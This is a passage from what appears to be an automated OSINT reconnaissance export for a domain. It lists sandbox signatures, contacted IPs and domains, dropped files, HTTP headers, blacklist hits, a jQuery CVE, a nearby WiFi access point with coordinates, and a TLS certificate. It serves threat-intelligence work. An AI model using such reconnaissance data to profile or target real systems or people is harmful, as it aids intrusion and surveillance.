u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"138.91.254.96:443"\n "185.199.109.153:443"\n "172.66.43.150:443"\n "162.241.219.194:443"\n "35.186.254.174:443"\n "191.101.3.40:443"\n "104.46.162.224:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "api.salesflare.com"\n "llink.to"\n "self.events.data.microsoft.com"\n "track.salesflare.com"\n "west.exchserverdata.one"\n "www.guelphcrc.ca"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006836]\n "wallet-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\6576_1201338111\\Filtering Rules]- [targetUID: 00000000-00006576]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\6576_1454671731\\edge_driver.js]- [targetUID: 00000000-00006576]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006836]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\6576_1454671731\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00006576]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6576_1201338111\\Filtering Rules-AA]- [targetUID: 00000000-00006576]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006576]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006836]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006836]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006836]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006836]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\6576_2018322271\\edge_autofill_field_data.json]- [targetUID: 00000000-00006576]\n "wallet-checkout-eligible-sites.json" has type "ASCII text"- [targetUID: N/A]\n "wallet-checkout-eligible-sites-pre-stable.json" has type "ASCII text"- [targetUID: N/A]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006576]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006576]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00006576]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\6576_1216152141\\safety_tips.pb]- [targetUID: 00000000-00006576]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006836]\n "Tabs_13328184206781632" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13328184206781632]- [targetUID: 00000000-00006576]\n "1e812de6-ba21-4912-a657-c6c0db9dfd3e.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\1e812de6-ba21-4912-a657-c6c0db9dfd3e.tmp]- [targetUID: 00000000-00006576]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "78d7a1c9-5693-428d-9fc6-b7f66687f3bf.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\78d7a1c9-5693-428d-9fc6-b7f66687f3bf.tmp]- [targetUID: 00000000-00006576]\n "8b2d30f7-d78f-400a-9946-770eb1538d9f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8b2d30f7-d78f-400a-9946-770eb1538d9f.tmp]- [targetUID: 00000000-00006576]\n "8a842fff-c60c-4637-8d2c-c71803472375.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8a842fff-c60c-4637-8d2c-c71803472375.tmp]- [targetUID: 00000000-00006576]\n "082c8fb6-a19d-45ef-a529-edaabf95a8e2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\082c8fb6-a19d-45ef-a529-edaabf95a8e2.tmp]- [targetUID: 00000000-00006576]\n "8a35266a-5ab3-4ff3-8644-ef8 | 185.199.109.153 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.171): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:13 | Physical Location | No | Censys | 0 | 0 | 4 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:08:53 | Vulnerability - CVE Medium | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2019-11358
https://nvd.nist.gov/vuln/detail/CVE-2019-11358
Score: 6.1
Description: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. | http://code.jquery.com/jquery-3.2.1.js |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.82 | 34.74.170.74 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nuke.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nuke.battleb0t.xyz', u'http_status': 521, u'plugins': {u'HTTPServer': {u'string': [u'cloudflare']}, u'Script': {}, u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'Title': {u'string': [u'nuke.battleb0t.xyz | 521: Web server is down']}, u'HTML5': {}, u'UncommonHeaders': {u'string': [u'referrer-policy,cf-ray']}, u'IP': {u'string': [u'172.64.80.1']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}, u'X-UA-Compatible': {u'string': [u'IE=Edge']}}}, {}] |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | itch.io (Category: gaming)
https://itch.io/profile/login | login |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Andrea Schwartz Gallery (Net ID: 00:01:9F:3D:4F:68) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.100): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://startling-sfogliatella-ade5c2.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9dc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_9dc_IESQMMUTEX_0_303"\n "IsoScope_9dc_IESQMMUTEX_0_519"\n "IsoScope_9dc_IESQMMUTEX_0_331"\n "IsoScope_9dc_IE_EarlyTabStart_0xa98_Mutex"\n "IsoScope_9dc_ConnHashTable<2524>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2524"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "34.90.63.227:443"\n "54.177.195.4:443"\n "35.190.72.161:443"\n "104.18.156.225:443"\n "35.190.36.172:443"\n "35.190.13.203:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2A22.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"aux.fqtag.com"\n "cdn.fqtag.com"\n "easy.find-your-partner.club"\n "flx808.lporirxe.com"\n "fqtag.com"\n "www.meetukrainianwomen.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "WT0NBVZJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WT0NBVZJ.txt]- [targetUID: 00000000-00003572]\n Dropped file: "ESIOX51V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ESIOX51V.txt]- [targetUID: 00000000-00002524]\n Dropped file: "06P9WVSV.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\06P9WVSV.txt]- [targetUID: 00000000-00003572]\n Dropped file: "TW7Y30DW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TW7Y30DW.txt]- [targetUID: 00000000-00003572]\n Dropped file: "OOCMX2SA.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OOCMX2SA.txt]- [targetUID: 00000000-00003572]\n Dropped file: "XW6TPSB5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XW6TPSB5.txt]- [targetUID: 00000000-00003572]\n Dropped file: "RV2OG8JU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RV2OG8JU.txt]- [targetUID: 00000000-00002524]\n Dropped file: "DFCSLJSN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DFCSLJSN.txt]- [targetUID: 00000000-00003572]\n Dropped file: "8QJH7RWY.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8QJH7RWY.txt]- [targetUID: 00000000-00003572]\n Dropped file: "73YHWE7Q.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\73YHWE7Q.txt]- [targetUID: 00000000-00003572]\n Dropped file: "QT4XHCLB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QT4XHCLB.txt]- [targetUID: 00000000-00003572]\n Dropped file: "3EMEL256.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3EMEL256.txt]- [targetUID: 00000000-00002524]\n Dropped file: "U7KDM2QP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\U7KDM2QP.txt]- [targetUID: 00000000-00003572]\n Dropped file: "5TF9TLHL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5TF9TLHL.txt]- [targetUID: 00000000-00003572]\n Dropped file: "IQ7XDVLA.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IQ7XDVLA.txt]- [targetUID: 00000000-00003572]\n Dropped file: "S85IMHP1.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S85IMHP1.txt]- [targetUID: 00000000-00003572]\n Dropped file: "5TL5FP3H.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5TL5FP3H.txt]- [targetUID: 00000000-00003572]\n Dropped file: "2J5IT986.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2J5IT986.txt]- [targetUID: 00000000-00003572]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2A21.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab28E6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "WT0NBVZJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WT0NBVZJ.txt]- [targetUID: 00000000-00003572]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003572]\n "jquery.autoComplete_1_.js" has type "UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "logo_3_.png" has type "PNG image data 862 x 94 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "animate_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "ESIOX51V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ESIOX51V.txt]- [targetUID: 00000000-00002524]\n "06P9WVSV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\06P9WVSV.txt]- [targetUID: 00000000-00003572]\n "LibreBaskervilleBold_1_.eot" has type "Embedded OpenType (EOT) LibreBaskervilleBold family"- [targetUID: N/A]\n "bgpure_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] baseline precision 8 1920x962 components 3"- [targetUID: N/A]\n "Cab2A21.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2A21.tmp]- [targetUID: 00000000-00003572]\n "my_validate_index2_1_.js" has type "UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "TW7Y30DW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TW7Y30DW.txt]- [targetUID: 00000000-00003572]\n "OOCMX2SA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OOCMX2SA.txt]- [targetUID: 00000000-00003572]\n "XW6TPSB5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XW6TPSB5.txt]- [targetUID: 00000000-00003572]\n "Tar2A22.tmp" has type "data"- Location: [%TEMP%\\Tar2A22.tmp]- [targetUID: 00000000-00003572]\n "LibreBaskervilleBold_1_.woff" has type "Web Open Font Format TrueType length 33572 version 1.0"- [targetUID: N/A]\n "~DFE2927C1515C3768D.TMP" has type "data"- Location: [%TEMP%\\~DFE2927C1515C3768D.TMP]- [targetUID: 00000000-00002524]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://startling-sfogliatella-ade5c2.netlify.app/"\n Pattern match: "https://startling-sfogliatella-ade5c2.netlify.app"\n Heuristic match: "aux.fqtag.com"\n Heuristic match: "cdn.fqtag.com"\n Heuristic match: "flx808.lporirxe.com"\n Heuristic match: "fqtag.com"\n Pattern match: "www.meetukrainianwomen.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u're | 104.196.30.220 |
| 2023-05-12 02:53:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:f9:3b:c0:6f:f8:ab:e7:35:d5:ff:95:55:28:
87:2c:f3:42:5c:6a:f2:dc:b2:0f:7b:b2:97:bc:68:
c2:d8:25:b1:da:3c:de:c9:ee:4a:54:a6:08:c9:a0:
d5:34:39:c8:96:b7:d1:e3:5d:f3:2b:db:f7:37:5d:
57:65:f7:3d:16:c9:ad:d6:e6:bb:bc:97:c6:1c:bc:
c7:1d:a0:c9:cc:3a:d4:e1:69:37:d2:58:c2:fe:42:
4e:90:a6:4c:72:5e:0f:c5:0a:f9:18:b1:c7:54:af:
b4:03:13:bc:ce:85:b6:0d:a5:99:fc:98:b2:37:24:
39:66:7b:f1:78:3b:4b:9e:51:be:75:ad:a6:19:8d:
be:a9:ca:f2:df:b7:73:9f:c6:14:09:e1:46:c4:93:
a4:45:7c:eb:1e:47:42:88:d1:8d:e7:29:c0:07:7b:
ad:57:d3:0b:cf:a1:a1:bc:65:12:20:8e:92:81:50:
55:40:69:4e:0d:62:29:ab:00:e6:81:6e:83:3a:16:
09:da:2a:57:32:b1:5d:79:74:f0:1d:02:e0:52:6d:
d5:85:2d:cb:f6:ef:5e:8f:03:a0:14:64:19:bb:71:
65:85:3e:bc:4e:e8:75:85:4b:a0:7d:df:3f:2a:67:
46:82:ea:56:e3:e5:01:c8:49:e2:f1:a3:b1:04:af:
98:45:24:1b:7e:2d:57:39:72:ff:5a:94:89:31:42:
ae:19:e5:2d:eb:c8:08:fc:be:37:02:5d:04:1a:b3:
f0:62:42:14:91:38:7a:96:77:5e:53:eb:f1:d9:8e:
45:46:0d:65:07:6b:18:0a:65:96:3c:4e:b9:77:05:
52:b4:4d:17:73:72:d9:49:c8:16:75:9c:84:35:12:
73:86:4f:08:27:5d:f3:e9:85:10:9a:ff:e4:3a:63:
ef:83:9f:03:76:a4:3f:ac:72:d5:f4:bb:3a:60:bc:
21:1c:e8:7c:52:79:bd:fe:19:9a:69:78:22:a6:5d:
64:8d:04:55:f3:ec:4d:6c:47:45:2c:6c:9e:cc:14:
be:67:76:25:be:fd:51:60:a1:2e:10:af:1b:46:0c:
e9:ec:3a:3c:0b:c9:2a:97:61:1c:a8:6a:9d:53:cd:
2d:6c:4e:66:f4:08:01:29:89:61:ff:d2:73:d2:a1:
da:94:32:dc:5c:78:ad:19:fa:b3:fb:26:0f:35:c2:
87:17:c9:ae:6f:c7:ce:81:d6:7d:27:95:3b:49:39:
e6:cf:30:85:95:79:a1:35:71:86:5b:66:f7:9d:ae:
96:d5:9a:1d:e3:e0:76:fe:b7:a0:b5:1a:16:0b:1b:
5e:d4:d9:5b:b6:4a:4d:33:65:03:80:b9:ab:69:35:
1b:42:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:52:05.336 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:57:F9:C2:75:97:36:8B:12:D4:C1:E7:CA:
50:E7:70:49:3E:19:7B:CF:6E:2E:B2:32:0A:7B:AB:5D:
31:9F:A6:29:02:21:00:A5:FD:E1:03:A8:C4:49:20:AF:
46:1D:1E:50:E3:8E:07:43:7A:DC:16:22:84:DD:F5:8B:
28:06:E9:91:CB:AE:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 13 13:52:05.327 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:EA:4C:FF:35:E1:97:F0:36:1E:40:22:
0D:44:8D:BA:C6:F1:8F:73:35:1F:B7:67:97:EA:2B:1B:
FC:27:7F:33:02:21:00:81:59:F8:29:60:75:D8:8F:00:
